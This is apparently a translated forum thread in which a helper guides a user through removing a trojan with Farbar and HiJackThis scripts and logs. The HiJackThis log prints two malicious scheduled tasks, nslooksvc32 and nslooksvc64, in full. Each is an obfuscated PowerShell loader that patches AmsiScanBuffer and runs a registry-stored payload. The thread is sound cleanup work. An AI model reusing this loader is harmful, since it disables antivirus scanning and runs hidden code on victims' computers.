How can Trojan Win32 Sepeh Gen be cleaned?

In order:

From Control Panel, uninstall Kaspersky, McAfee, Trojan Remover, Links and every other application I don't recognize.

Run the tools below one after the other and clean up the leftovers.


After copying the code, press the Fix button in Farbar. Share the file named Fixlog.txt here.

Code:
start::
emptytemp:
virustotal: C:\Windows\System32\DriverStore\FileRepository\u0376944.inf_amd64_7a28758ed8b2ac21\B376966\atieclxx.exe;C:\Users\muhan\AppData\Local\Programs\Blitz\Blitz.exe;C:\Program Files\Mozilla Firefox\firefox.exe;C:\Windows\System32\amdfendrsr.exe;C:\Windows\System32\DriverStore\FileRepository\u0376944.inf_amd64_7a28758ed8b2ac21\B376966\atiesrxx.exe;C:\Program Files\AMD\CNext\CNext\CPUMetricsServer.exe;C:\Program Files (x86)\Razer\Razer Services\GMS\GameManagerService.exe;D:\Games\Grand Theft Auto V\Launcher\RockstarService.exe;C:\Program Files (x86)\Razer\Razer Services\Razer Central\RazerCentralService.exe;D:\Razer Gamebooster\Razer Cortex\RzKLService.exe;C:\Windows\system32\Device.dll;C:\Windows\system32\ISDone.dll;C:\Windows\system32\Platform.dll;C:\Windows\bsdsetupDH.dll;C:\Windows\SysWOW64\ADsSecurity.dll;C:\Program Files\AMD\CNext\CNext\QtWebEngineProcess.exe
File: C:\Users\muhan\AppData\Local\Yandex;C:\Users\muhan\AppData\Roaming\SmartSteamEmu;C:\Users\muhan\AppData\LocalLow\Redbeet Interactive;C:\Users\muhan\AppData\Roaming\Windows;C:\Users\muhan\AppData\Local\7b85455024c255fb2d382134ede54108;C:\Users\muhan\AppData\Local\ADMITLoving;C:\Users\muhan\AppData\Local\Cloud Game;(FragSoft) C:\Windows\system32\ISDone.dll;C:\Users\muhan\.opera;C:\Users\muhan\Downloads\.opera
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
BootExecute:
GroupPolicy: Restriction ? <==== ATTENTION
Policies: C:\ProgramData\NTUSER.pol: Restriction <==== ATTENTION
Task: {52D709F9-9C14-424B-9077-5D714CEF9E0D} - System32\Tasks\TR_FastScan_AtLogon => C:\Program Files (x86)\Trojan Remover\Trjscan.exe [6467352 2022-01-28] (Simply Super Software -> Simply Super Software)
Task: {709D0865-F852-409F-B5BC-139428474DF8} - System32\Tasks\TR_FastScan_Daily_Yılmaz => C:\Program Files (x86)\Trojan Remover\Trjscan.exe [6467352 2022-01-28] (Simply Super Software -> Simply Super Software)
Task: {96E4AAA5-2DF0-4BF4-AA59-0C9ABDAB6C0A} - System32\Tasks\nslooksvc32 => powershell "function Local:KUUibsYzdVVZ{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$flCbqwKNrRNgbw,[Parameter(Position=1)][Type]$trxeVYymQW)$paalNHZeNmu=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAcces (the data entry has 2227 more characters).
Task: {BFCC12A3-664B-42EB-8B9F-2A4BB1629A5C} - System32\Tasks\TR_AntiHijack => C:\Program Files (x86)\Trojan Remover\TRAntiHJ.exe (No File)
Task: {C9226DF5-08C3-486B-92A1-3039634E7EF5} - System32\Tasks\TR_Updater => C:\Program Files (x86)\Trojan Remover\Trupd.exe [6384408 2022-01-06] (Simply Super Software -> Simply Super Software)
Task: {D1333CC2-6205-4BAE-8ED2-B9A2A50A1599} - System32\Tasks\nslooksvc64 => powershell "function Local:yZzuiYRezadz{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$EWellkmPyYZzro,[Parameter(Position=1)][Type]$LjtIPhnXDu)$XEsJbemsTkG=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAcces (the data entry has 2220 more characters).
Tcpip\..\Interfaces\{05b349b0-aef9-4fed-b459-1625b65a9eda}: [DhcpNameServer] 192.168.42.129
Tcpip\..\Interfaces\{ae71b50f-2054-491a-b219-1eb1f48c7549}: [DhcpNameServer] 192.168.42.129
FF HKLM\...\Firefox\Extensions: [[email protected]] - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Anti-Virus 21.3\FFExt\light_plugin_firefox\addon.xpi => not found
FF HKLM-x32\...\Firefox\Extensions: [[email protected]] - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Anti-Virus 21.3\FFExt\light_plugin_firefox\addon.xpi => not found
FF ExtraCheck: C:\Program Files\mozilla firefox\defaults\pref\kl_prefs_62fbb8f7_c917_4cf7_957a_aad2b8fa768c.js [2022-03-06] <==== ATTENTION (Points to *.cfg file)
FF ExtraCheck: C:\Program Files\mozilla firefox\kl_config_62fbb8f7_c917_4cf7_957a_aad2b8fa768c.cfg [2022-03-06] <==== ATTENTION
CHR Extension: (Safe Torrent Scanner) - C:\Users\muhan\AppData\Local\Google\Chrome\User Data\Default\Extensions\aegnopegbbhjeeiganiajffnalhlkkjb [2022-01-16]
CHR Extension: (Fishing.io) - C:\Users\muhan\AppData\Local\Google\Chrome\User Data\Default\Extensions\ijifibpcinhcgbmclfilhcbcojmkdemh [2021-12-22]
CHR HKLM-x32\...\Chrome\Extension: [aegnopegbbhjeeiganiajffnalhlkkjb]
R2 McAfee WebAdvisor; C:\Program Files\McAfee\WebAdvisor\ServiceHost.exe [971504 2021-12-26] (McAfee, LLC -> McAfee, LLC)
2022-03-06 11:41 - 2022-03-06 11:41 - 000004146 _____ C:\Windows\system32\Tasks\TR_FastScan_Daily_Yılmaz
2022-03-06 11:41 - 2022-03-06 11:41 - 000004004 _____ C:\Windows\system32\Tasks\TR_FastScan_AtLogon
2022-03-06 11:41 - 2022-03-06 11:41 - 000003946 _____ C:\Windows\system32\Tasks\TR_Updater
2022-03-06 11:41 - 2022-03-06 11:41 - 000003786 _____ C:\Windows\system32\Tasks\TR_AntiHijack
2022-03-06 11:41 - 2022-03-06 11:41 - 000001371 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Trojan Remover FastScan.lnk
2022-03-06 11:41 - 2022-03-06 11:41 - 000001271 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Trojan Remover Updater.lnk
2022-03-06 11:41 - 2022-03-06 11:41 - 000001250 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Trojan Remover.lnk
2022-03-06 11:41 - 2022-03-06 11:41 - 000000000 ____D C:\Users\muhan\Documents\Simply Super Software
2022-03-06 11:41 - 2022-03-06 11:41 - 000000000 ____D C:\ProgramData\Simply Super Software
2022-03-06 11:41 - 2022-03-06 11:41 - 000000000 ____D C:\Program Files (x86)\Trojan Remover
2021-12-26 14:45 - 2021-12-26 14:45 - 000000000 ____D C:\ProgramData\McAfee
2021-12-26 14:45 - 2021-12-26 14:45 - 000000000 ____D C:\ProgramData\AVG
2021-12-26 14:45 - 2021-12-26 14:45 - 000000000 ____D C:\Program Files\McAfee
2022-03-03 16:27 - 2022-03-05 14:52 - 000000000 ____D C:\ProgramData\Avast Software
AV: Kaspersky Anti-Virus (Disabled - Up to date) {4F76F112-43EB-40E8-11D8-F7BD1853EA23}
FW: Kaspersky Security Cloud (Disabled) {774D7037-0984-41B0-3A87-5E88E680AD58}
Kaspersky Anti-Virus (HKLM-x32\...\{4FC79BE9-AD63-46C0-9626-E4F6BCE6A976}) (Version: 21.3.10.391 - Kaspersky) Hidden
Links version 1.0 (HKU\S-1-5-21-1593825937-2386105780-1848293327-1005\...\Links_is1) (Version: 1.0 - Links) <==== ATTENTION
ContextMenuHandlers1: [Trojan Remover] -> {52B87208-9CCF-42C9-B88E-069281105805} => C:\Program Files (x86)\Trojan Remover\Trshlex64.dll [2018-10-25] (Simply Super Software -> Simply Super Software)
ContextMenuHandlers2: [Trojan Remover] -> {52B87208-9CCF-42C9-B88E-069281105805} => C:\Program Files (x86)\Trojan Remover\Trshlex64.dll [2018-10-25] (Simply Super Software -> Simply Super Software)
ContextMenuHandlers6: [Trojan Remover] -> {52B87208-9CCF-42C9-B88E-069281105805} => C:\Program Files (x86)\Trojan Remover\Trshlex64.dll [2018-10-25] (Simply Super Software -> Simply Super Software)
FirewallRules: [{9512C89E-6BE2-4C79-8A83-66AE2CB09ACC}] => (Allow) C:\Program Files (x86)\360\Total Security\safemon\QHSafeTray.exe => No File
FirewallRules: [{559034AF-7527-45AB-A0AB-59178D3B1518}] => (Allow) C:\Program Files (x86)\360\Total Security\safemon\QHSafeTray.exe => No File
FirewallRules: [{B7E90CAA-1493-4949-86A0-F0D04A4CC2A7}] => (Allow) C:\Program Files (x86)\360\Total Security\360TsLiveUpd.exe => No File
FirewallRules: [{9FE56EC5-53B8-4560-9040-28D919EDDAAF}] => (Allow) C:\Program Files (x86)\360\Total Security\360TsLiveUpd.exe => No File
FirewallRules: [{51654940-0E91-496C-94F9-388259243044}] => (Allow) C:\Program Files (x86)\360\Total Security\360TsLiveUpd.exe => No File
FirewallRules: [{2A048AE4-BDFE-4E81-894F-AD0EB00E8DBA}] => (Allow) C:\Program Files (x86)\360\Total Security\360TsLiveUpd.exe => No File
end::
 
Sir, the Fixlog note is above, but Farbar Recovery was downloaded automatically to my D drive; Windows is installed on my C drive. Will that be a problem?
@acv sir, where are you?
 
It won't. Remove the extensions named Fishing.io and Safe Torrent Scanner from Chrome. Then share the report below.

 
[CODE title="HiJackThis"]Logfile of HiJackThis Fork by Alex Dragokas v.2.10.0.16

Platform: x64 Windows 10 (Pro), 10.0.19043.1526 (ReleaseId: 2009, 21H1), Service Pack: 0
Time: 06.03.2022 - 21:58 (UTC+03:00)
Language: OS: Turkish (0x41F). Display: Turkish (0x41F). Non-Unicode: Turkish (0x41F)
Elevated: Yes
Ran by: Yılmaz (group: Administrators) on DESKTOP-DU3LFJF, FirstRun: yes

Chrome: 96.0.4664.110
Firefox: 97.0.2.8098
Internet Explorer: 11.0.19041.1202
Default: "C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url "%1" (Firefox)

Boot mode: Normal

Running processes:
Number | Path
1 C:\Program Files\AMD\CNext\CNext\AMDRSServ.exe
1 C:\Program Files\AMD\CNext\CNext\AMDRSSrcExt.exe
1 C:\Program Files\AMD\CNext\CNext\cncmd.exe
1 C:\Program Files\AMD\CNext\CNext\CPUMetricsServer.exe
1 C:\Program Files\AMD\CNext\CNext\QtWebEngineProcess.exe
1 C:\Program Files\AMD\CNext\CNext\RadeonSoftware.exe
1 C:\Program Files\Riot Vanguard\vgc.exe
1 C:\Program Files\Riot Vanguard\vgtray.exe
1 C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2201.10-0\MpCopyAccelerator.exe
1 C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2201.10-0\MsMpEng.exe
1 C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2201.10-0\NisSrv.exe
6 C:\Users\muhan\AppData\Local\Discord\app-1.0.9004\Discord.exe
7 C:\Users\muhan\AppData\Local\Programs\Blitz\Blitz.exe
1 C:\Users\muhan\Desktop\HiJackThis.exe
1 C:\Windows\explorer.exe
1 C:\Windows\System32\amdfendrsr.exe
1 C:\Windows\System32\audiodg.exe
2 C:\Windows\System32\csrss.exe
1 C:\Windows\System32\ctfmon.exe
1 C:\Windows\System32\dasHost.exe
2 C:\Windows\System32\DriverStore\FileRepository\realtekservice.inf_amd64_3dd75df32535321a\RtkAudUService64.exe
1 C:\Windows\System32\DriverStore\FileRepository\u0376724.inf_amd64_aa44b9d5e398e987\B376581\atieclxx.exe
1 C:\Windows\System32\DriverStore\FileRepository\u0376724.inf_amd64_aa44b9d5e398e987\B376581\atiesrxx.exe
1 C:\Windows\System32\dwm.exe
2 C:\Windows\System32\fontdrvhost.exe
1 C:\Windows\System32\lsass.exe
4 C:\Windows\System32\RuntimeBroker.exe
1 C:\Windows\System32\SearchIndexer.exe
1 C:\Windows\System32\SecurityHealthService.exe
1 C:\Windows\System32\SecurityHealthSystray.exe
1 C:\Windows\System32\services.exe
1 C:\Windows\System32\SettingSyncHost.exe
1 C:\Windows\System32\SgrmBroker.exe
1 C:\Windows\System32\sihost.exe
1 C:\Windows\System32\smartscreen.exe
1 C:\Windows\System32\smss.exe
1 C:\Windows\System32\spoolsv.exe
70 C:\Windows\System32\svchost.exe
1 C:\Windows\System32\taskhostw.exe
2 C:\Windows\System32\wbem\WmiPrvSE.exe
1 C:\Windows\System32\wininit.exe
1 C:\Windows\System32\winlogon.exe
1 C:\Windows\SystemApps\Microsoft.LockApp_cw5n1h2txyewy\LockApp.exe
1 C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
1 C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
1 C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe
1 C:\Windows\SysWOW64\dllhost.exe

O2 - HKLM\..\BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files\Java\jre1.8.0_51\bin\jp2ssv.dll
O2 - HKLM\..\BHO: Java(tm) Plug-In SSV Helper - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.8.0_51\bin\ssv.dll
O4 - HKCU\..\Run: [com.blitz.app] = C:\Users\muhan\AppData\Local\Programs\Blitz\Blitz.exe --autostart
O4 - HKCU\..\Run: [Discord] = C:\Users\muhan\AppData\Local\Discord\Update.exe --processStart Discord.exe
O4 - HKCU\..\StartupApproved\Run: [Opera GX Browser Assistant] = C:\Users\muhan\AppData\Local\Programs\Opera GX\assistant\browser_assistant.exe (2021/05/13)
O4 - HKLM\..\Run: [Riot Vanguard] = C:\Program Files\Riot Vanguard\vgtray.exe
O4 - HKLM\..\Run: [RtkAudUService] = C:\Windows\System32\DriverStore\FileRepository\realtekservice.inf_amd64_3dd75df32535321a\RtkAudUService64.exe -background
O17 - DHCP DNS 1: 192.168.1.1
O22 - BITS Job: (download) {2982ED1B-9DF7-4A96-8A4F-AF6135D30AB2} - http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/fay7bjcbpgagtaithciieeva4u_20220222.431134436/obedbbhbpmojnkanicioggnmelmoomoc_20220222.431134436_all_TR500000_ktwdq23epwopvzpl77f6epukky.crx3 -> C:\Users\muhan\AppData\Local\Temp\chrome_BITS_9464_2144227497\obedbbhbpmojnkanicioggnmelmoomoc_20220222.431134436_all_TR500000_ktwdq23epwopvzpl77f6epukky.crx3
O22 - BITS Job: Fix all (including legit)
O22 - Task (.job): (disabled) (Not scheduled) CreateExplorerShellUnelevatedTask.job - C:\Windows\explorer.exe
O22 - Task (.job): (disabled) nslooksvc32.job - (no file)
O22 - Task (.job): (disabled) nslooksvc64.job - (no file)
O22 - Task: (damaged) C:\Windows\System32\Tasks\McAfee (empty)
O22 - Task: (damaged) HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\nslooksvc32 (key missing)
O22 - Task: (damaged) HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\nslooksvc64 (key missing)
O22 - Task: (disabled) \Agent Activation Runtime\S-1-5-21-1593825937-2386105780-1848293327-1001 - C:\Windows\System32\AgentActivationRuntimeStarter.exe
O22 - Task: (disabled) \Agent Activation Runtime\S-1-5-21-1593825937-2386105780-1848293327-1005 - C:\Windows\System32\AgentActivationRuntimeStarter.exe
O22 - Task: (disabled) \Microsoft\Windows\Management\Provisioning\Retry - C:\Windows\system32\ProvTool.exe /turn 5 /source ProvRetryTask (Microsoft)
O22 - Task: (disabled) \Microsoft\Windows\Management\Provisioning\RunOnReboot - C:\Windows\system32\ProvTool.exe /turn 5 /source ContinueSessionTask (Microsoft)
O22 - Task: (disabled) \Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work - C:\Windows\system32\usoclient.exe StartMaintenanceWork (Microsoft)
O22 - Task: (disabled) \Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work - C:\Windows\system32\usoclient.exe StartWork (Microsoft)
O22 - Task: (disabled) googleupdatetaskmachinecore - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /c
O22 - Task: (disabled) googleupdatetaskmachineua - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /ua /installsource scheduler
O22 - Task: (telemetry) \Microsoft\Windows\Application Experience\PcaPatchDbTask - C:\Windows\system32\rundll32.exe C:\Windows\system32\PcaSvc.dll,PcaPatchSdbTask (Microsoft)
O22 - Task: \Microsoft\Windows\Defrag\ScheduledDefrag - C:\Windows\system32\defrag.exe \\?\Volume{d1427864-26fc-4798-9271-6340f51fe19e}\ (Microsoft)
O22 - Task: \Mozilla\Firefox Background Update 308046B0AF4A39CB - C:\Program Files\Mozilla Firefox\firefox.exe --MOZ_LOG sync,prependheader,timestamp,append,maxsize:1,Dump:5 --MOZ_LOG_FILE C:\ProgramData\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\updates\308046B0AF4A39CB\backgroundupdate.moz_log --backgroundtask backgroundupdate
O22 - Task: \Mozilla\Firefox Default Browser Agent 308046B0AF4A39CB - C:\Program Files\Mozilla Firefox\default-browser-agent.exe do-task "308046B0AF4A39CB"
O22 - Task: AMDInstallLauncher - C:\Program Files\AMD\CIM\Bin64\InstallManagerApp.exe /InstallAUEP
O22 - Task: AMDLinkUpdate - C:\Program Files\AMD\CIM\Bin64\InstallManagerApp.exe -AMDLinkUpdate
O22 - Task: AMDRyzenMasterSDKTask - C:\Program Files\AMD\CNext\CNext\cpumetricsserver.exe
O22 - Task: Kaspersky_Upgrade_Launcher_{278ADC42-419D-4547-A6CA-5B74BE0AD901} - C:\Program Files\Common Files\AV\Kaspersky Lab\upgrade_launcher.exe /waitUpgrade (file missing)
O22 - Task: ModifyLinkUpdate - C:\Program Files\AMD\CIM\Bin64\InstallManagerApp.exe -UpdateCurrentUser
O22 - Task: nslooksvc32 - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "function Local:KUUibsYzdVVZ{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$flCbqwKNrRNgbw,[Parameter(Position=1)][Type]$trxeVYymQW)$paalNHZeNmu=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$paalNHZeNmu.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$flCbqwKNrRNgbw).SetImplementationFlags('Runtime,Managed');$paalNHZeNmu.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$trxeVYymQW,$flCbqwKNrRNgbw).SetImplementationFlags('Runtime,Managed');Write-Output $paalNHZeNmu.CreateType();}$esKTVjEbEydev=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$BLsWUgXPabQYEv=$esKTVjEbEydev.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$zhDFYQRlKZJklGZhJlg=KUUibsYzdVVZ @([String])([IntPtr]);$HouUUsVdZbZakOwaaqnUNb=KUUibsYzdVVZ 
@([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$FjTfoJARZLM=$esKTVjEbEydev.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$qIROLtoHyfQMRl=$BLsWUgXPabQYEv.Invoke($Null,@([Object]$FjTfoJARZLM,[Object]('Load'+'LibraryA')));$BzKZfVwvYaCgfQTdI=$BLsWUgXPabQYEv.Invoke($Null,@([Object]$FjTfoJARZLM,[Object]('Vir'+'tual'+'Pro'+'tect')));$gqDzMuu=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($qIROLtoHyfQMRl,$zhDFYQRlKZJklGZhJlg).Invoke('a'+'m'+'si.dll');$thgHnFpRwqzfvbdgl=$BLsWUgXPabQYEv.Invoke($Null,@([Object]$gqDzMuu,[Object]('Ams'+'iSc'+'an'+'Buffer')));$tFojzPMnml=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($BzKZfVwvYaCgfQTdI,$HouUUsVdZbZakOwaaqnUNb).Invoke($thgHnFpRwqzfvbdgl,[uint32]8,4,[ref]$tFojzPMnml);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$thgHnFpRwqzfvbdgl,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($BzKZfVwvYaCgfQTdI,$HouUUsVdZbZakOwaaqnUNb).Invoke($thgHnFpRwqzfvbdgl,[uint32]8,0x20,[ref]$tFojzPMnml);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('nslookstager')).EntryPoint.Invoke($Null,$Null)"
O22 - Task: nslooksvc64 - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "function Local:yZzuiYRezadz{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$EWellkmPyYZzro,[Parameter(Position=1)][Type]$LjtIPhnXDu)$XEsJbemsTkG=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$XEsJbemsTkG.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$EWellkmPyYZzro).SetImplementationFlags('Runtime,Managed');$XEsJbemsTkG.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$LjtIPhnXDu,$EWellkmPyYZzro).SetImplementationFlags('Runtime,Managed');Write-Output $XEsJbemsTkG.CreateType();}$EznyfjngDAhAs=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$sYOssrpLYJJpjX=$EznyfjngDAhAs.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$aAfmdyFNvhcWtryWFmg=yZzuiYRezadz @([String])([IntPtr]);$iyqMBNsEEaEwzblKaRROoC=yZzuiYRezadz 
@([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$LUQEzwkExfi=$EznyfjngDAhAs.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$vESqRXeDRnNXMw=$sYOssrpLYJJpjX.Invoke($Null,@([Object]$LUQEzwkExfi,[Object]('Load'+'LibraryA')));$gsFUORhqEFVSkXOmO=$sYOssrpLYJJpjX.Invoke($Null,@([Object]$LUQEzwkExfi,[Object]('Vir'+'tual'+'Pro'+'tect')));$MyWMWhO=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($vESqRXeDRnNXMw,$aAfmdyFNvhcWtryWFmg).Invoke('a'+'m'+'si.dll');$SNXmKatLTctWUQlcY=$sYOssrpLYJJpjX.Invoke($Null,@([Object]$MyWMWhO,[Object]('Ams'+'iSc'+'an'+'Buffer')));$VNvaCoBJHL=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($gsFUORhqEFVSkXOmO,$iyqMBNsEEaEwzblKaRROoC).Invoke($SNXmKatLTctWUQlcY,[uint32]8,4,[ref]$VNvaCoBJHL);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$SNXmKatLTctWUQlcY,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($gsFUORhqEFVSkXOmO,$iyqMBNsEEaEwzblKaRROoC).Invoke($SNXmKatLTctWUQlcY,[uint32]8,0x20,[ref]$VNvaCoBJHL);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('nslookstager')).EntryPoint.Invoke($Null,$Null)"
O22 - Task: OneDrive Per-Machine Standalone Update Task - C:\Program Files\Microsoft OneDrive\OneDriveStandaloneUpdater.exe
O22 - Task: OneDrive Reporting Task-S-1-5-21-1593825937-2386105780-1848293327-1005 - C:\Program Files\Microsoft OneDrive\OneDriveStandaloneUpdater.exe /reporting
O22 - Task: OneDrive Standalone Update Task-S-1-5-21-1058129444-4087973727-844704433-500 - C:\Users\muhan\AppData\Local\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe (file missing)
O22 - Task: Opera GX scheduled assistant Autoupdate 1620210764 - C:\Users\muhan\AppData\Local\Programs\Opera GX\launcher.exe --scheduledautoupdate --component-name=assistant --component-path="C:\Users\muhan\AppData\Local\Programs\Opera GX\assistant" $(Arg0)
O22 - Task: Opera GX scheduled Autoupdate 1618946092 - C:\Users\muhan\AppData\Local\Programs\Opera GX\launcher.exe --scheduledautoupdate $(Arg0)
O22 - Task: StartCN - C:\Program Files\AMD\CNext\CNext\cncmd.exe startwithdelay
O22 - Task: StartDVR - C:\Program Files\AMD\CNext\CNext\RSServCmd.exe
O23 - Service R2: AMD Crash Defender Service - C:\Windows\System32\amdfendrsr.exe
O23 - Service R2: AMD External Events Utility - C:\Windows\System32\DriverStore\FileRepository\u0376724.inf_amd64_aa44b9d5e398e987\B376581\atiesrxx.exe
O23 - Service R2: Realtek Audio Universal Service - (RtkAudioUniversalService) - C:\Windows\System32\DriverStore\FileRepository\realtekservice.inf_amd64_3dd75df32535321a\RtkAudUService64.exe
O23 - Service R2: vgc - C:\Program Files\Riot Vanguard\vgc.exe
O23 - Service S3: BattlEye Service - (BEService) - C:\Program Files (x86)\Common Files\BattlEye\BEService.exe
O23 - Service S3: EasyAntiCheat - C:\Program Files (x86)\EasyAntiCheat\EasyAntiCheat.exe
O23 - Service S3: FileSyncHelper - C:\Program Files\Microsoft OneDrive\22.022.0130.0001\FileSyncHelper.exe
O23 - Service S3: Google Chrome Elevation Service (GoogleChromeElevationService) - (GoogleChromeElevationService) - C:\Program Files\Google\Chrome\Application\96.0.4664.110\elevation_service.exe
O23 - Service S3: Google Güncelleme Hizmeti (gupdate) - (gupdate) - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /svc
O23 - Service S3: Google Güncelleme Hizmeti (gupdatem) - (gupdatem) - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /medsvc
O23 - Service S3: Letasoft Sound Booster Service - (SoundBoosterService) - C:\Program Files (x86)\Letasoft Sound Booster\SoundBoosterService.exe
O23 - Service S3: Mozilla Maintenance Service - (MozillaMaintenance) - C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
O23 - Service S3: OneDrive Updater Service - C:\Program Files\Microsoft OneDrive\22.022.0130.0001\OneDriveUpdaterService.exe
O23 - Service S3: Rockstar Game Library Service - (Rockstar Service) - D:\Games\Grand Theft Auto V\Launcher\RockstarService.exe (file missing)
O23 - Service S3: Steam Client Service - C:\Program Files (x86)\Common Files\Steam\steamservice.exe /RunAsService



Debug information:

- 06.03.2022 21:58:01 - LoadFileToStream - #0 LastDllError = 225 () CreateFile C:\Windows\Tasks\nslooksvc32.job
- 06.03.2022 21:58:01 - ParseJob. Unable to open file: C:\Windows\Tasks\nslooksvc32.job - #0 LastDllError = 0
- 06.03.2022 21:58:01 - LoadFileToStream - #0 LastDllError = 225 () CreateFile C:\Windows\Tasks\nslooksvc64.job
- 06.03.2022 21:58:01 - ParseJob. Unable to open file: C:\Windows\Tasks\nslooksvc64.job - #0 LastDllError = 0

--
End of file - Time spent: 13,7 sec. - 32926 bytes, CRC32: FFFFFFFF. Sign: 䕥趉
 
Fix these.

Code:
O22 - BITS Job: (download) {2982ED1B-9DF7-4A96-8A4F-AF6135D30AB2} - http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/fay7bjcbpgagtaithciieeva4u_20220222.431134436/obedbbhbpmojnkanicioggnmelmoomoc_20220222.431134436_all_TR500000_ktwdq23epwopvzpl77f6epukky.crx3 -> C:\Users\muhan\AppData\Local\Temp\chrome_BITS_9464_2144227497\obedbbhbpmojnkanicioggnmelmoomoc_20220222.431134436_all_TR500000_ktwdq23epwopvzpl77f6epukky.crx3
O22 - BITS Job: Fix all (including legit)
O22 - Task (.job): (disabled) nslooksvc32.job - (no file)
O22 - Task (.job): (disabled) nslooksvc64.job - (no file)
O22 - Task: (damaged) C:\Windows\System32\Tasks\McAfee (empty)
O22 - Task: (damaged) HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\nslooksvc32 (key missing)
O22 - Task: (damaged) HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\nslooksvc64 (key missing)
O22 - Task: (telemetry) \Microsoft\Windows\Application Experience\PcaPatchDbTask - C:\Windows\system32\rundll32.exe C:\Windows\system32\PcaSvc.dll,PcaPatchSdbTask (Microsoft)
O22 - Task: Kaspersky_Upgrade_Launcher_{278ADC42-419D-4547-A6CA-5B74BE0AD901} - C:\Program Files\Common Files\AV\Kaspersky Lab\upgrade_launcher.exe /waitUpgrade (file missing)
